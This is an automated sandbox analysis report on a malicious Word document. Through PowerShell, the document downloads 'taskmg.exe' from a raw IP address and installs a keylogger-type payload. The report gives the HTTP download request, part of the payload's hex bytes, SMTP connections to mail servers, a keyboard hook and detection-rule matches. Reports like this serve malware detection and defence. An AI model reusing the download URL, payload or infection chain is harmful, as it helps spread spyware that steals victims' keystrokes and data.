00 00 00 00 00 0c 00 88 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 0c 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 0c cf 0b 00 00 20 00 00 00 d0 0b 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 88 06 00 00 00 00 0c 00 00 08 00 00 00 d2 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 0c 00 00 02 00 00 00 da 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 ee 0b 00 00 00 00 00 48 00 00 00 02 00 05 00 ac 48 01 00 a0 21 01 00 03 00 00 00 8c 01 00 06 4c 6a 02 00 10 84 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 be 02 73 1f 00 00 0a 7d 01 00 00 04 02 73 20 00 00 0a 7d 06 00 00 04 02 28 21 00 00 0a 02 28 14 00 00 06 02 7b 0d 00 00 04 17 6f 22 00 00 0a 2a 1b 30 03 00 ac 00 00 00 01 00 00 11 02 28 03 00 00 06 02 03 7d 03 00 00 04 03 2d 09 02 14 7d 02 00 00 04 2b 54 02 7b 01 00 00 04 03 6f 23 00 00 0a 6f 24 00 00 0a 2c 19 02 02 7b 01 00 00 04 03 6f 23 00 00 0a 6f 25 00 00 0a 7d 02 00 00 04 2b 28 02 73 26 00 00 0a 7d 02 00 00 04 02 7b 01 00 00 04 03 6f 23 00 00 0a 02 7b 02 00 00 04 6f 27 00 00 0a 02 28 07 00 00 06 02 7b 02 00 00 04 2c 36 02 7b 02 00 00 04 6f 28 00 00 0a 0a 2b 0f 12 00 28 29 00 00 0a 0b 02 07 28 10 00 00 06 12 00 28 2a 00 00 0a 2d e8 de 0e 12 00 fe 16 11 00 00 1b 6f 12 00 00 0a dc 2a 01 10 00 00 02 00 81 00 1c 9d 00 0e 00 00 00 00 8e 02 7b 06 00 00 04 6f 2b 00 00 0a 02 7b 09 00 00 04 6f 2c 00 00 0a 6f 2d 00 00 0a 02 14 7d 03 00 00 04 2a 13 30 03 00 29 00 00 00 02 00 00 11 02 7b 07 00 00 04 0a 06 0b 07 03 28 2e 00 00 0a 74 04 00 00 02 0c 02 7
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.19.9Date: Thu, 25 Nov 2021 17:14:59 GMTContent-Type: application/octet-streamContent-Length: 777216Last-Modified: Thu, 25 Nov 2021 03:51:30 GMTConnection: keep-aliveETag: "619f0842-bdc00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 42 08 9f 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 d0 0b 00 00 0a 00 00 00 00 00 00 ae ee 0b 00 00 20 00 00 00 00 0c 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 0c 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5c ee 0b 00 4f 00 00 00 00 00 0c 00 88 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 0c 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 0c cf 0b 00 00 20 00 00 00 d0 0b 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 88 06 00 00 00 00 0c 00 00 08 00 00 00 d2 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 0c 00 00 02 00 00 00 da 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 ee 0b 00 00 00 00 00 48 00 00 00 02 00 05 00 ac 48 01 00 a0 21 01 00 03 00 00 00 8c 01 00 06 4c 6a 02 00 10 84 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 be 02 73 1f 00 00 0a 7d 01 00 00 04 02 73 20 00 00 0a 7d 06 00 00 04 02 28 21 00 00 0a 02 28 14 00 00 06 02 7b 0d 00 00 04 17 6f 22 00 00 0a 2a 1b 30 03 00 ac 00 00 00 01 00 00 11 02 28 03 00 00 06 02 03 7d 03 00 00 04 03 2d 09 02 14 7d 02 00 00 04 2b 54 02 7b 01 00 00 04 03 6f 23 00 00 0a 6f 24 00 00 0a 2c 19 02 02 7b 01 00 00 04 03 6f 23 00 00 0a 6f 25 00 00 0a 7d 02 00 00 04 2b 28 02 73 26 00 00 0a 7d 02 00 00 04 02 7b 01 00 00 04 03 6f 23 00 00 0a 02 7b 02 00 00 04 6f 27 00 00 0a 02 28 07 00 00 06 02 7b 02 00 00 04 2c 36 02 7b 02 00 00 04 6f 28 00 00 0a 0a 2b 0f 12 00 28 29 00 00 0a 0b 02 07 28 10 00 00 06 12 00 28 2a 00 00 0a 2d e8 de 0e 12 00 fe 16 11 00 00 1b 6f 12 00 00 0a dc 2a 01 10 00 00 02 00 81 00 1c 9d 00 0e 00 00 00 00 8e 02 7b 06 00 00 04 6f 2b 00 00 0a 02 7b 09 00 00 04 6f 2c 00 00 0a 6f 2d 00 00 0a 02 14 7d 03 00 00 04 2a 13 30 03 00 29 00 00 00 02 00 00 11 02 7b 07 00 00 04 0a 06 0b 07 03 28 2e 00 00 0a 74 04 00 00 02 0c 02 7
                    Source: global trafficHTTP traffic detected: GET /taskmg.exe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 173.232.204.89Connection: Keep-Alive
                    Source: Joe Sandbox ViewASN Name: PUBLIC-DOMAIN-REGISTRYUS PUBLIC-DOMAIN-REGISTRYUS
                    Source: Joe Sandbox ViewASN Name: PUBLIC-DOMAIN-REGISTRYUS PUBLIC-DOMAIN-REGISTRYUS
                    Source: Joe Sandbox ViewIP Address: 208.91.198.143 208.91.198.143
                    Source: Joe Sandbox ViewIP Address: 208.91.199.225 208.91.199.225
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 208.91.199.224:587
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 208.91.199.225:587
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 208.91.199.223:587
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 208.91.198.143:587
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 208.91.199.224:587
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 208.91.199.225:587
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 208.91.199.223:587
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 208.91.198.143:587
                    Source: powershell.exe, 00000005.00000002.420421279.000000000363C000.00000004.00000001.sdmpString found in binary or memory: httP://173.232
                    Source: powershell.exe, 00000003.00000002.429675159.000000000364C000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.420421279.000000000363C000.00000004.00000001.sdmpString found in binary or memory: httP://173.232.2
                    Source: powershell.exe, 00000005.00000002.420421279.000000000363C000.00000004.00000001.sdmpString found in binary or memory: httP://173.232.204.89/t
                    Source: powershell.exe, 00000005.00000002.420421279.000000000363C000.00000004.00000001.sdmpString found in binary or memory: httP://173.232.204.89/taskmg.
                    Source: powershell.exe, 00000005.00000002.418266539.0000000000160000.00000004.00000020.sdmp, powershell.exe, 00000005.00000002.418277171.000000000019E000.00000004.00000020.sdmp, powershell.exe, 00000005.00000002.419023647.0000000002C91000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.418378144.00000000004A4000.00000004.00000040.sdmpString found in binary or memory: httP://173.232.204.89/taskmg.exe
                    Source: powershell.exe, 00000003.00000002.429675159.000000000364C000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.420421279.000000000363C000.00000004.00000001.sdmpString found in binary or memory: httP://173.232.204.89/taskmg.exePE
                    Source: taskmg.exe, 0000000E.00000002.704893314.00000000027A1000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                    Source: powershell.exe, 00000003.00000002.430015540.0000000003749000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.429675159.000000000364C000.00000004.00000001.sdmpString found in binary or memory: http://173.232.204.89
                    Source: powershell.exe, 00000003.00000002.429675159.000000000364C000.00000004.00000001.sdmpString found in binary or memory: http://173.232.204.89/taskmg.exe
                    Source: taskmg.exe, 0000000E.00000002.704893314.00000000027A1000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
                    Source: taskmg.exe, 0000000E.00000002.705042151.0000000002817000.00000004.00000001.sdmpString found in binary or memory: http://EW9kaPSTVWDzFNsliGsC.org
                    Source: taskmg.exe, 0000000E.00000002.705042151.0000000002817000.00000004.00000001.sdmpString found in binary or memory: http://EW9kaPSTVWDzFNsliGsC.org(Zgt
                    Source: taskmg.exe, 0000000E.00000002.704893314.00000000027A1000.00000004.00000001.sdmpString found in binary or memory: http://GwvXXB.com
                    Source: powershell.exe, 00000005.00000002.418277171.000000000019E000.00000004.00000020.sdmpString found in binary or memory: http://java.co_w
                    Source: powershell.exe, 00000003.00000002.423981506.000000000043E000.00000004.00000020.sdmpString found in binary or memory: http://java.cohe
                    Source: powershell.exe, 00000003.00000002.424369467.0000000002510000.00000002.00020000.sdmp, powershell.exe, 00000005.00000002.418546129.0000000002210000.00000002.00020000.sdmp, taskmg.exe, 00000009.00000002.447397125.00000000057A0000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                    Source: taskmg.exe, 00000009.00000002.446030181.00000000027A1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: schtasks.exe, 0000000C.00000002.437567787.0000000000740000.00000002.00020000.sdmpString found in binary or memory: http://servername/isapibackend.dll
                    Source: powershell.exe, 00000003.00000002.424369467.0000000002510000.00000002.00020000.sdmp, powershell.exe, 00000005.00000002.418546129.0000000002210000.00000002.00020000.sdmp, taskmg.exe, 00000009.00000002.447397125.00000000057A0000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
                    Source: powershell.exe, 00000003.00000002.423981506.000000000043E000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleanerv
                    Source: taskmg.exe, 0000000E.00000002.705002661.00000000027F0000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%
                    Source: taskmg.exe, 0000000E.00000002.704893314.00000000027A1000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%GETMozilla/5.0
                    Source: taskmg.exe, 00000009.00000002.446756970.000000000384A000.00000004.00000001.sdmp, taskmg.exe, 0000000E.00000000.443795246.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                    Source: taskmg.exe, 0000000E.00000002.704893314.00000000027A1000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{6B5678D1-0902-45B5-A7D8-811025AE74F7}.tmpJump to behavior
                    Source: unknownDNS traffic detected: queries for: us2.smtp.mailhostbox.com
                    Source: global trafficHTTP traffic detected: GET /taskmg.exe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 173.232.204.89Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /taskmg.exe HTTP/1.1Host: 173.232.204.89Connection: Keep-Alive
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89

                    Key, Mouse, Clipboard, Microphone and Screen Capturing:

                    barindex
                    Installs a global keyboard hookShow sources
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\taskmg.exe
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeWindow created: window name: CLIPBRDWNDCLASS

                    System Summary:

                    barindex
                    Document contains OLE streams with names of living off the land binariesShow sources
                    Source: ~WRF{2A2CF84F-B5BA-43C4-A797-10CB765CC9B0}.tmp.0.drStream path '_1699369208/\x1Ole10Native' : T}....abdtfhgXgeghDp..ScT.C:\nsdsTggH\abdtfhgXGeghDp..ScT..... ...C:\CbkepaDw\abdtfhghgeghDp..ScT.|.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                    Source: ~WRF{2A2CF84F-B5BA-43C4-A797-10CB765CC9B0}.tmp.0.drStream path '_1699369236/\x1Ole10Native' : D~....abdtfhgXgeghDp..ScT.C:\nsdsTggH\abdtfhgXGeghDp..ScT.....6...C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp..ScT..|..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                    Powershell drops PE fileShow sources
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\taskmg.exeJump to dropped file
                    .NET source code contains very large array initializationsShow sources
                    Source: 14.0.taskmg.exe.400000.13.unpack, u003cPrivateImplementationDetailsu003eu007b7D8661CAu002d2C0Au002d4493u002dAE88u002d5ADC1243DCCAu007d/F57C54F7u002dA459u002d4722u002dB554u002d98E451E63B57.csLarge array initialization: .cctor: array initializer size 12046
                    Source: 14.0.taskmg.exe.400000.9.unpack, u003cPrivateImplementationDetailsu003eu007b7D8661CAu002d2C0Au002d4493u002dAE88u002d5ADC1243DCCAu007d/F57C54F7u002dA459u002d4722u002dB554u002d98E451E63B57.csLarge array initialization: .cctor: array initializer size 12046
                    Source: 14.2.taskmg.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007b7D8661CAu002d2C0Au002d4493u002dAE88u002d5ADC1243DCCAu007d/F57C54F7u002dA459u002d4722u002dB554u002d98E451E63B57.csLarge array initialization: .cctor: array initializer size 12046
                    Source: 14.0.taskmg.exe.400000.11.unpack, u003cPrivateImplementationDetailsu003eu007b7D8661CAu002d2C0Au002d4493u002dAE88u002d5ADC1243DCCAu007d/F57C54F7u002dA459u002d4722u002dB554u002d98E451E63B57.csLarge array initialization: .cctor: array initializer size 12046
                    Microsoft Office creates scripting filesShow sources
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScTJump to behavior
                    Office process drops PE fileShow sources
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\taskmg[1].exeJump to dropped file
                    Document contains a stream with embedded javascript codeShow sources
                    Source: ~WRF{2A2CF84F-B5BA-43C4-A797-10CB765CC9B0}.tmp.0.drStream path '_1699369208/\x1Ole10Native' : Found JS content: T}....abdtfhgXgeghDp..ScT.C:\nsdsTggH\abdtfhgXGeghDp..ScT..... ...C:\CbkepaDw\abdtfhghgeghDp..ScT.|............................................................................................................................................................
                    Source: ~WRF{2A2CF84F-B5BA-43C4-A797-10CB765CC9B0}.tmp.0.drStream path '_1699369236/\x1Ole10Native' : Found JS content: D~....abdtfhgXgeghDp..ScT.C:\nsdsTggH\abdtfhgXGeghDp..ScT.....6...C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp..ScT..|.....................................................................................................................................
                    Found suspicious RTF objectsShow sources
                    Source: abdtfhgXgeghDp.ScTStatic RTF information: Object: 0 Offset: 000007DAh abdtfhgXgeghDp.ScT
                    Source: ~WRF{2A2CF84F-B5BA-43C4-A797-10CB765CC9B0}.tmp.0.drOLE indicator application name: unknown
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeCode function: 9_2_012DA2A9
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeCode function: 9_2_002B4AE0
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeCode function: 9_2_002B5920
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeCode function: 9_2_002B5910
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeCode function: 9_2_002B5B70
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeCode function: 9_2_012DA035
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeCode function: 14_2_012DA2A9
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeCode function: 14_2_005865D8
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeCode function: 14_2_005859C0
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeCode function: 14_2_00585D08
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeCode function: 14_2_00582297
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeCode function: 14_2_007228F0
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeCode function: 14_2_00721A90
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeCode function: 14_2_00727915
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeCode function: 14_2_00720048
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeCode function: 14_2_00722008
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeCode function: 14_2_00720898
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeCode function: 14_2_00720748
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeCode function: 14_2_00C40048
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeCode function: 14_2_00C48858
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeCode function: 14_2_00C43430
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeCode function: 14_2_00C4F320
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeCode function: 14_2_00C4C288
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeCode function: 14_2_012DA035
                    Source: ~WRF{2A2CF84F-B5BA-43C4-A797-10CB765CC9B0}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeMemory allocated: 76F90000 page execute and read and write
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeMemory allocated: 76E90000 page execute and read and write
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeMemory allocated: 76F90000 page execute and read and write
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeMemory allocated: 76E90000 page execute and read and write
                    Source: 00000003.00000002.423965866.0000000000400000.00000004.00000020.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
                    Source: 00000005.00000002.418266539.0000000000160000.00000004.00000020.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
                    Source: ~WRF{2A2CF84F-B5BA-43C4-A797-10CB765CC9B0}.tmp.0.drOLE indicator has summary info: false
                    Source: taskmg[1].exe.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: taskmg.exe.3.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: gZfDBpJYZ.exe.9.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$confirm The Details.docJump to behavior
                    Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winDOC@21/27@9/5
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
                    Source: ~WRF{2A2CF84F-B5BA-43C4-A797-10CB765CC9B0}.tmp.0.drOLE document summary: title field not present or empty
                    Source: ~WRF{2A2CF84F-B5BA-43C4-A797-10CB765CC9B0}.tmp.0.drOLE document summary: author field not present or empty
                    Source: ~WRF{2A2CF84F-B5BA-43C4-A797-10CB765CC9B0}.tmp.0.drOLE document summary: edited time not present or 0
                    Source: Reconfirm The Details.docReversingLabs: Detection: 29%
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................p.......#.................7.....p.........7.......2.....`I4........v.....................K;.....................................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....#.................2k....8.................W.............}..v............0................"l.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../.......u.r.i.n.g. .a. .W.e.b.C.l.i.e.n.t. .r.e.q.u.e.s.t..."...........0................"l.....6.......................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../.................2k......................W.............}..v....(.......0................"l.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.7.W.............}..v....8.......0................"l.....".......................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;.................2k......................W.............}..v....p.......0................"l.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G...............B.2k....P%l...............W.............}..v....8.......0...............................................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G.................2k......................W.............}..v....p.......0................"l.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S...............B.2k....P%l...............W.............}..v....8.......0...............................................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S.................2k......................W.............}..v....p.......0................"l.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._.......\.A.l.b.u.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.t.a.s.k.m.g...e.x.e.'.............."l.....D.......................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._.................2k......................W.............}..v............0................"l.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....k...............B.2k....P%l...............W.............}..v....X.......0...............................................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....k.................2k......................W.............}..v............0................"l.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................E.E.....w...............B.2k....P%l...............W.............}..v............0.......................f.......................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....w.................2k......................W.............}..v............0................"l.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ .......B.2k....P%l...............W.............}..v............0................"l.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................2k....H.................W.............}..v............0................"l.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................E.E......................u2k......l...............W.............}..v....pO......0...............................................
